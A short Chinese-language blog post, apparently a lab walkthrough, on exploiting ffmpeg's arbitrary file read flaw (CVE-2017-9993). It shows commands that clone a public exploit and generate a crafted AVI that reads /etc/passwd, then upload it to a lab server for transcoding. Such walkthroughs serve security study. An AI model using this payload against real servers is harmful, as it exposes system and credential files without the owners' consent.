ffmpeg 任意文件读取漏洞


ffmpeg 任意文件读取漏洞(CVE-2017-9993)

漏洞利用

漏洞原理不再赘述,直接下载exp,并生成payload:

# 下载exp
git clone https://github.com/neex/ffmpeg-avi-m3u-xbin
cd ffmpeg-avi-m3u-xbin

# 生成payload
./gen_xbin_avi.py file:///etc/passwd exp.avi

生成exp.avi,在http://your-ip:8080/上传。后端将会将你上传的视频用ffmpeg转码后显示,转码时因为ffmpeg的任意文件读取漏洞,可将文件信息读取到视频中:


文章作者: Geekby
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Geekby !
 上一篇
Flask(Jinja2)服务端模板注入漏洞 Flask(Jinja2)服务端模板注入漏洞
Flask(Jinja2) 服务端模板注入漏洞原理参考文章 https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-
2019-02-16
下一篇 
ffmpeg 任意文件读取漏洞/SSRF漏洞 ffmpeg 任意文件读取漏洞/SSRF漏洞
ffmpeg 任意文件读取漏洞/SSRF漏洞 (CVE-2016-1897/CVE-2016-1898)在FFMpeg2.X 由于在解析HTTP Live Streaming流媒体m3u8文件处理不当,可导致SSRF漏洞与任意文件读取漏洞。
2019-02-15
  目录